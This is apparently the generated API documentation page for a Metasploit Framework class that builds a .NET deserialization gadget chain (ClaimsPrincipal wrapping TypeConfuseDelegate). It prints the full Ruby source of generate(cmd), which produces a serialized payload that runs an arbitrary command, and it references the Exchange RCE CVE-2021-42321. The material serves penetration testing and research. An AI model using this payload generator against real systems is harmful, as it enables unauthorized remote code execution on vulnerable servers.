Class: Msf::Util::DotNetDeserialization::GadgetChains::ClaimsPrincipal

Inherits:
Types::SerializedStream show all
Defined in:
lib/msf/util/dot_net_deserialization/gadget_chains/claims_principal.rb

Class Method Summary collapse

Methods inherited from Types::SerializedStream

from_values, #get_object, #set_object

Class Method Details

.generate(cmd) ⇒ Object

ClaimsPrincipal

Credits:
  Finders: jang
  Contributors: jang
References:
  https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852



15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
 
# File 'lib/msf/util/dot_net_deserialization/gadget_chains/claims_principal.rb', line 15

def self.generate(cmd)
  inner = GadgetChains::TypeConfuseDelegate.generate(cmd)

  self.from_values([
    Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),
    Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(
      class_info: Types::General::ClassInfo.new(
        obj_id: 1,
        name: 'System.Security.Claims.ClaimsPrincipal',
        member_names: %w{ m_serializedClaimsIdentities }
      ),
      member_type_info: Types::General::MemberTypeInfo.new(
        binary_type_enums: %i{ String },
      ),
      member_values: [
        Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
          obj_id: 5,
          string: Rex::Text.encode_base64(inner.to_binary_s)
        ))
      ]
    ),
    Types::RecordValues::MessageEnd.new
  ])
end